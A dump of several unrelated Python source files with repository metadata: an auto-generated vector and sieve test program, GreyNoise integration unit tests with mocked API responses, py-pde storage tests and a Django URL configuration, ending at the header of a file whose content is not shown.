def remove_at3(self:"Vector4", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector4", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector4", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector4", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector4", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector4") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector4") -> int:
return self.size
# A resizable list of integers
class Vector5(object):
items: [int] = None
items2: [int] = None
items3: [int] = None
items4: [int] = None
items5: [int] = None
size: int = 0
size2: int = 0
size3: int = 0
size4: int = 0
size5: int = 0
def __init__(self:"Vector5"):
self.items = [0]
# Returns current capacity
def capacity(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity2(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity3(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity4(self:"Vector5") -> int:
return len(self.items)
# Returns current capacity
def capacity5(self:"Vector5") -> int:
return len(self.items)
# Increases capacity of vector by one element
def increase_capacity(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity2(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity3(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity4(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Increases capacity of vector by one element
def increase_capacity5(self:"Vector5") -> int:
self.items = self.items + [0]
return self.capacity()
# Appends one item to end of vector
def append(self:"Vector5", item: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append2(self:"Vector5", item: int, item2: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append3(self:"Vector5", item: int, item2: int, item3: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append4(self:"Vector5", item: int, item2: int, item3: int, item4: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends one item to end of vector
def append5(self:"Vector5", item: int, item2: int, item3: int, item4: int, item5: int) -> object:
if self.size == self.capacity():
self.increase_capacity()
self.items[self.size] = item
self.size = self.size + 1
# Appends many items to end of vector
def append_all(self:"Vector5", new_items: [int]) -> object:
item:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all2(self:"Vector5", new_items: [int], new_items2: [int]) -> object:
item:int = 0
item2:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all3(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all4(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
for item in new_items:
self.append(item)
# Appends many items to end of vector
def append_all5(self:"Vector5", new_items: [int], new_items2: [int], new_items3: [int], new_items4: [int], new_items5: [int]) -> object:
item:int = 0
item2:int = 0
item3:int = 0
item4:int = 0
item5:int = 0
for item in new_items:
self.append(item)
# Removes an item from the middle of vector
def remove_at(self:"Vector5", idx: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at2(self:"Vector5", idx: int, idx2: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at3(self:"Vector5", idx: int, idx2: int, idx3: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Removes an item from the middle of vector
def remove_at5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> object:
if idx < 0:
return
while idx < self.size - 1:
self.items[idx] = self.items[idx + 1]
idx = idx + 1
self.size = self.size - 1
# Retrieves an item at a given index
def get(self:"Vector5", idx: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get2(self:"Vector5", idx: int, idx2: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get3(self:"Vector5", idx: int, idx2: int, idx3: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get4(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int) -> int:
return self.items[idx]
# Retrieves an item at a given index
def get5(self:"Vector5", idx: int, idx2: int, idx3: int, idx4: int, idx5: int) -> int:
return self.items[idx]
# Retrieves the current size of the vector
def length(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length2(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length3(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length4(self:"Vector5") -> int:
return self.size
# Retrieves the current size of the vector
def length5(self:"Vector5") -> int:
return self.size
# A faster (but more memory-consuming) implementation of vector
class DoublingVector(Vector):
doubling_limit:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector2(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector2") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector3(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector3") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector4(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector4") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# A faster (but more memory-consuming) implementation of vector
class DoublingVector5(Vector):
doubling_limit:int = 1000
doubling_limit2:int = 1000
doubling_limit3:int = 1000
doubling_limit4:int = 1000
doubling_limit5:int = 1000
# Overriding to do fewer resizes
def increase_capacity(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity2(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity3(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity4(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Overriding to do fewer resizes
def increase_capacity5(self:"DoublingVector5") -> int:
if (self.capacity() <= self.doubling_limit // 2):
self.items = self.items + self.items
else:
# If doubling limit has been reached, fall back to
# standard capacity increases
self.items = self.items + [0]
return self.capacity()
# Makes a vector in the range [i, j)
def vrange(i:int, j:int) -> Vector:
v:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange2(i:int, j:int, i2:int, j2:int) -> Vector:
v:Vector = None
v2:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange3(i:int, j:int, i2:int, j2:int, i3:int, j3:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange4(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
def vrange5(i:int, j:int, i2:int, j2:int, i3:int, j3:int, i4:int, j4:int, i5:int, j5:int) -> Vector:
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
v = DoublingVector()
while i < j:
v.append(i)
i = i + 1
return v
# Sieve of Eratosthenes (not really)
def sieve(v:Vector) -> object:
i:int = 0
j:int = 0
k:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve2(v:Vector, v2:Vector) -> object:
i:int = 0
i2:int = 0
j:int = 0
j2:int = 0
k:int = 0
k2:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve3(v:Vector, v2:Vector, v3:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
j:int = 0
j2:int = 0
j3:int = 0
k:int = 0
k2:int = 0
k3:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve4(v:Vector, v2:Vector, v3:Vector, v4:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
def sieve5(v:Vector, v2:Vector, v3:Vector, v4:Vector, v5:Vector) -> object:
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
j:int = 0
j2:int = 0
j3:int = 0
j4:int = 0
j5:int = 0
k:int = 0
k2:int = 0
k3:int = 0
k4:int = 0
k5:int = 0
while i < v.length():
k = v.get(i)
j = i + 1
while j < v.length():
if v.get(j) % k == 0:
v.remove_at(j)
else:
j = j + 1
i = i + 1
# Input parameter
n:int = 50
n2:int = 50
n3:int = 50
n4:int = 50
n5:int = 50
# Data
v:Vector = None
v2:Vector = None
v3:Vector = None
v4:Vector = None
v5:Vector = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
# Crunch
v = vrange(2, n)
v2 = vrange(2, n)
v3 = vrange(2, n)
v4 = vrange(2, n)
v5 = vrange(2, n)
sieve(v)
# Print
while i < v.length():
print(v.get(i))
i = i + 1
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
5b82ca7833330ee0646d306a6cef65cb5c33df37
|
762742b3c5cb5706e93e12dbdc3f8c46fc65f0db
|
/Packs/GreyNoise/Integrations/GreyNoise/GreyNoise_test.py
|
bc42620c600a89f5bf9c62f42f621c88f3b2320f
|
[
"MIT"
] |
permissive
|
EmersonElectricCo/content
|
018f95f7fe7de13819e093a3661587a18407e348
|
82c82bbee7d428f0b14991a88c67672e2c02f5af
|
refs/heads/master
| 2021-06-17T04:54:22.938033
| 2021-05-06T16:39:59
| 2021-05-06T16:39:59
| 161,693,191
| 2
| 0
|
MIT
| 2018-12-18T15:16:49
| 2018-12-13T20:47:26
|
Python
|
UTF-8
|
Python
| false
| false
| 8,763
|
py
|
import pytest
import json
import GreyNoise
from test_data.input_data import ( # type: ignore
parse_code_and_body_data,
get_ip_reputation_score_data,
test_module_data,
ip_reputation_command_data,
ip_quick_check_command_data,
generate_advanced_query_data,
query_command_data,
get_ip_context_data_data,
stats_command_data,
riot_command_response_data
)
class DummyResponse:
"""
Dummy Response object of requests.response for unit testing.
"""
def __init__(self, headers, text, status_code):
self.headers = headers
self.text = text
self.status_code = status_code
def json(self):
"""
Dummy json method.
"""
return json.loads(self.text)
@pytest.mark.parametrize("input_data, expected_output", parse_code_and_body_data)
def test_parse_code_and_body(input_data, expected_output):
"""
Tests various combinations of error codes and messages.
"""
response = GreyNoise.parse_code_and_body(input_data)
assert response == expected_output
@pytest.mark.parametrize("input_data, expected_output", get_ip_reputation_score_data)
def test_get_ip_reputation_score(input_data, expected_output):
"""
Tests various combinations of GreyNoise classification data.
"""
response = GreyNoise.get_ip_reputation_score(input_data)
assert response == expected_output
@pytest.mark.parametrize("api_key, api_response, status_code, expected_output", test_module_data)
def test_test_module(api_key, api_response, status_code, expected_output, mocker):
"""
Tests test_module for GreyNoise integration.
"""
client = GreyNoise.Client(api_key, "dummy_server", 10, "proxy", False, "dummy_integration")
if isinstance(api_key, str) and api_key == "true_key":
mocker.patch('greynoise.GreyNoise._request', return_value=api_response)
response = GreyNoise.test_module(client)
assert response == expected_output
else:
dummy_response = DummyResponse({}, api_response, status_code)
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.test_module(client)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", ip_reputation_command_data)
def test_ip_reputation_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of vald and invalid responses for IPReputation command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
if test_scenario == "positive":
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_reputation_command(client, args)
assert response[0].outputs == expected_output
else:
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_reputation_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", ip_quick_check_command_data)
def test_ip_quick_check_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for ip-quick-check command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
if test_scenario == "positive":
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_quick_check_command(client, args)
assert response.outputs == expected_output
elif test_scenario == "negative" and status_code == 200:
mocker.patch('requests.Session.get', return_value=dummy_response)
response = GreyNoise.ip_quick_check_command(client, args)
with open('test_data/quick_check.md') as f:
expected_hr = f.read()
assert response.readable_output == expected_hr
elif test_scenario == "negative":
mocker.patch('requests.Session.get', return_value=dummy_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_quick_check_command(client, args)
assert str(err.value) == expected_output
elif test_scenario == "custom":
mocker.patch('greynoise.GreyNoise.quick', return_value=api_response)
with pytest.raises(Exception) as err:
_ = GreyNoise.ip_quick_check_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, expected_output", generate_advanced_query_data)
def test_generate_advanced_query(args, expected_output):
"""
Tests various combinations of command arguments to generate GreyNoise advanced_query for query/stats command.
"""
response = GreyNoise.generate_advanced_query(args)
assert response == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", query_command_data)
def test_query_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for query command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.query_command(client, args)
assert response.outputs[GreyNoise.QUERY_OUTPUT_PREFIX['IP']] == expected_output['data']
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.query_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("args, test_scenario, api_response, status_code, expected_output", stats_command_data)
def test_stats_command(args, test_scenario, api_response, status_code, expected_output, mocker):
"""
Tests various combinations of valid and invalid responses for stats command.
"""
client = GreyNoise.Client("true_api_key", "dummy_server", 10, "proxy", False, "dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(api_response),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.stats_command(client, args)
assert response.outputs == expected_output
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.stats_command(client, args)
assert str(err.value) == expected_output
@pytest.mark.parametrize("input_data, expected_output", get_ip_context_data_data)
def test_get_ip_context_data(input_data, expected_output):
"""
Tests various combinations for converting ip-context and query command responses from sdk to Human Readable format.
"""
response = GreyNoise.get_ip_context_data(input_data)
assert response == expected_output
@pytest.mark.parametrize("test_scenario, status_code, input_data, expected", riot_command_response_data)
def test_riot_command(mocker, test_scenario, status_code, input_data, expected):
"""
Test various inputs for riot command
"""
client = GreyNoise.Client(api_key="true_api_key", api_server="dummy_server", timeout=10,
proxy="proxy", use_cache=False, integration_name="dummy_integration")
dummy_response = DummyResponse(
{
"Content-Type": "application/json"
},
json.dumps(expected["raw_data"]),
status_code
)
mocker.patch('requests.Session.get', return_value=dummy_response)
if test_scenario == "positive":
response = GreyNoise.riot_command(client, input_data)
assert response.outputs == expected["raw_data"]
else:
with pytest.raises(Exception) as err:
_ = GreyNoise.riot_command(client, input_data)
assert str(err.value) == expected["error_message"].format(input_data["ip"])
|
[
"noreply@github.com"
] |
noreply@github.com
|
91c2e382f455de622a8bfb58b1df4f5bbe6b01ff
|
e13a79dec2668c1870b3fea05f071fe872d400f0
|
/pde/storage/tests/test_generic_storages.py
|
474649dd328980f34d7df91ecac637408b9e3bd6
|
[
"MIT"
] |
permissive
|
yiweizhang1025/py-pde
|
b27cc0b058b50d6af921e1ea84bf59a5bb0ff370
|
3862a35505b9ce4d62557bc65dfedd40638a90f3
|
refs/heads/master
| 2023-03-14T17:21:07.004742
| 2021-03-15T15:33:47
| 2021-03-15T15:33:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,739
|
py
|
"""
.. codeauthor:: David Zwicker <david.zwicker@ds.mpg.de>
"""
import functools
import numpy as np
import pytest
from pde import DiffusionPDE, FileStorage, MemoryStorage, UnitGrid
from pde.fields import FieldCollection, ScalarField, Tensor2Field, VectorField
from pde.tools.misc import module_available
def test_storage_write(tmp_path):
""" test simple memory storage """
dim = 5
grid = UnitGrid([dim])
field = ScalarField(grid)
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for name, storage_cls in storage_classes.items():
storage = storage_cls(info={"a": 1})
storage.start_writing(field, info={"b": 2})
storage.append(field.copy(data=np.arange(dim)), 0)
storage.append(field.copy(data=np.arange(dim)), 1)
storage.end_writing()
assert not storage.has_collection
np.testing.assert_allclose(storage.times, np.arange(2))
for f in storage:
np.testing.assert_array_equal(f.data, np.arange(dim))
for i in range(2):
np.testing.assert_array_equal(storage[i].data, np.arange(dim))
assert {"a": 1, "b": 2}.items() <= storage.info.items()
storage = storage_cls()
storage.clear()
for i in range(3):
storage.start_writing(field)
storage.append(field.copy(data=np.arange(dim) + i), i)
storage.end_writing()
np.testing.assert_allclose(
storage.times, np.arange(3), err_msg="storage class: " + name
)
def test_storage_truncation(tmp_path):
""" test whether simple trackers can be used """
file = tmp_path / "test_storage_truncation.hdf5"
for truncate in [True, False]:
storages = [MemoryStorage()]
if module_available("h5py"):
storages.append(FileStorage(file))
tracker_list = [s.tracker(interval=0.01) for s in storages]
grid = UnitGrid([8, 8])
state = ScalarField.random_uniform(grid, 0.2, 0.3)
pde = DiffusionPDE()
pde.solve(state, t_range=0.1, dt=0.001, tracker=tracker_list)
if truncate:
for storage in storages:
storage.clear()
pde.solve(state, t_range=[0.1, 0.2], dt=0.001, tracker=tracker_list)
times = np.arange(0.1, 0.201, 0.01)
if not truncate:
times = np.r_[np.arange(0, 0.101, 0.01), times]
for storage in storages:
msg = f"truncate={truncate}, storage={storage}"
np.testing.assert_allclose(storage.times, times, err_msg=msg)
assert not storage.has_collection
def test_storing_extract_range(tmp_path):
""" test methods specific to FieldCollections in memory storage """
sf = ScalarField(UnitGrid([1]))
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for storage_cls in storage_classes.values():
# store some data
s1 = storage_cls()
s1.start_writing(sf)
s1.append(sf.copy(data=np.array([0])), 0)
s1.append(sf.copy(data=np.array([2])), 1)
s1.end_writing()
np.testing.assert_equal(s1[0].data, 0)
np.testing.assert_equal(s1[1].data, 2)
np.testing.assert_equal(s1[-1].data, 2)
np.testing.assert_equal(s1[-2].data, 0)
with pytest.raises(IndexError):
s1[2]
with pytest.raises(IndexError):
s1[-3]
# test extraction
s2 = s1.extract_time_range()
assert s2.times == list(s1.times)
np.testing.assert_allclose(s2.data, s1.data)
s3 = s1.extract_time_range(0.5)
assert s3.times == s1.times[:1]
np.testing.assert_allclose(s3.data, s1.data[:1])
s4 = s1.extract_time_range((0.5, 1.5))
assert s4.times == s1.times[1:]
np.testing.assert_allclose(s4.data, s1.data[1:])
def test_storing_collection(tmp_path):
""" test methods specific to FieldCollections in memory storage """
grid = UnitGrid([2, 2])
f1 = ScalarField.random_uniform(grid, 0.1, 0.4, label="a")
f2 = VectorField.random_uniform(grid, 0.1, 0.4, label="b")
f3 = Tensor2Field.random_uniform(grid, 0.1, 0.4, label="c")
fc = FieldCollection([f1, f2, f3])
storage_classes = {"MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_write.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
for storage_cls in storage_classes.values():
# store some data
storage = storage_cls()
storage.start_writing(fc)
storage.append(fc, 0)
storage.append(fc, 1)
storage.end_writing()
assert storage.has_collection
assert storage.extract_field(0)[0] == f1
assert storage.extract_field(1)[0] == f2
assert storage.extract_field(2)[0] == f3
assert storage.extract_field(0)[0].label == "a"
assert storage.extract_field(0, label="new label")[0].label == "new label"
assert storage.extract_field(0)[0].label == "a" # do not alter label
assert storage.extract_field("a")[0] == f1
assert storage.extract_field("b")[0] == f2
assert storage.extract_field("c")[0] == f3
with pytest.raises(ValueError):
storage.extract_field("nonsense")
def test_storage_apply(tmp_path):
""" test the apply function of StorageBase """
grid = UnitGrid([2])
field = ScalarField(grid)
storage_classes = {"None": None, "MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_apply.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
s1 = MemoryStorage()
s1.start_writing(field, info={"b": 2})
s1.append(field.copy(data=np.array([0, 1])), 0)
s1.append(field.copy(data=np.array([1, 2])), 1)
s1.end_writing()
for name, storage_cls in storage_classes.items():
out = None if storage_cls is None else storage_cls()
s2 = s1.apply(lambda x: x + 1, out=out)
assert storage_cls is None or s2 is out
assert len(s2) == 2
np.testing.assert_allclose(s2.times, s1.times)
assert s2[0] == ScalarField(grid, [1, 2]), name
assert s2[1] == ScalarField(grid, [2, 3]), name
# test empty storage
s1 = MemoryStorage()
s2 = s1.apply(lambda x: x + 1)
assert len(s2) == 0
def test_storage_copy(tmp_path):
""" test the copy function of StorageBase """
grid = UnitGrid([2])
field = ScalarField(grid)
storage_classes = {"None": None, "MemoryStorage": MemoryStorage}
if module_available("h5py"):
file_path = tmp_path / "test_storage_apply.hdf5"
storage_classes["FileStorage"] = functools.partial(FileStorage, file_path)
s1 = MemoryStorage()
s1.start_writing(field, info={"b": 2})
s1.append(field.copy(data=np.array([0, 1])), 0)
s1.append(field.copy(data=np.array([1, 2])), 1)
s1.end_writing()
for name, storage_cls in storage_classes.items():
out = None if storage_cls is None else storage_cls()
s2 = s1.copy(out=out)
assert storage_cls is None or s2 is out
assert len(s2) == 2
np.testing.assert_allclose(s2.times, s1.times)
assert s2[0] == s1[0], name
assert s2[1] == s1[1], name
# test empty storage
s1 = MemoryStorage()
s2 = s1.copy()
assert len(s2) == 0
|
[
"david.zwicker@ds.mpg.de"
] |
david.zwicker@ds.mpg.de
|
45bb0f11373a3220f0f4387907cff7b0eee4e3f3
|
dc72589c38ba179524c2ee2e408c4f37b77cabf3
|
/backend/lizz_mob_jul15_dev_7685/urls.py
|
8827abab37592bfacf837a0176cebcca38cae754
|
[] |
no_license
|
crowdbotics-apps/lizz-mob-jul15-dev-7685
|
cbcab97908bd568acc68b606d4c5becdb160364c
|
a41e88b463169443bcfdf12cf356a958c44f3400
|
refs/heads/master
| 2022-11-17T22:30:15.286209
| 2020-07-16T17:54:10
| 2020-07-16T17:54:10
| 280,012,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,958
|
py
|
"""lizz_mob_jul15_dev_7685 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from allauth.account.views import confirm_email
from rest_framework import permissions
from drf_yasg.views import get_schema_view
from drf_yasg import openapi
urlpatterns = [
path("", include("home.urls")),
path("accounts/", include("allauth.urls")),
path("api/v1/", include("home.api.v1.urls")),
path("admin/", admin.site.urls),
path("users/", include("users.urls", namespace="users")),
path("rest-auth/", include("rest_auth.urls")),
# Override email confirm to use allauth's HTML view instead of rest_auth's API view
path("rest-auth/registration/account-confirm-email/<str:key>/", confirm_email),
path("rest-auth/registration/", include("rest_auth.registration.urls")),
]
admin.site.site_header = "lizz mob jul15"
admin.site.site_title = "lizz mob jul15 Admin Portal"
admin.site.index_title = "lizz mob jul15 Admin"
# swagger
api_info = openapi.Info(
title="lizz mob jul15 API",
default_version="v1",
description="API documentation for lizz mob jul15 App",
)
schema_view = get_schema_view(
api_info,
public=True,
permission_classes=(permissions.IsAuthenticated,),
)
urlpatterns += [
path("api-docs/", schema_view.with_ui("swagger", cache_timeout=0), name="api_docs")
]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
04da31593f90e147dd4899029a36daa0fe6f87e5
|
867d946a375a3ad9808af45c15e8b2ea3274da0f
|
/Scripts/Linux/SQLTimeBasedColumns.py
|
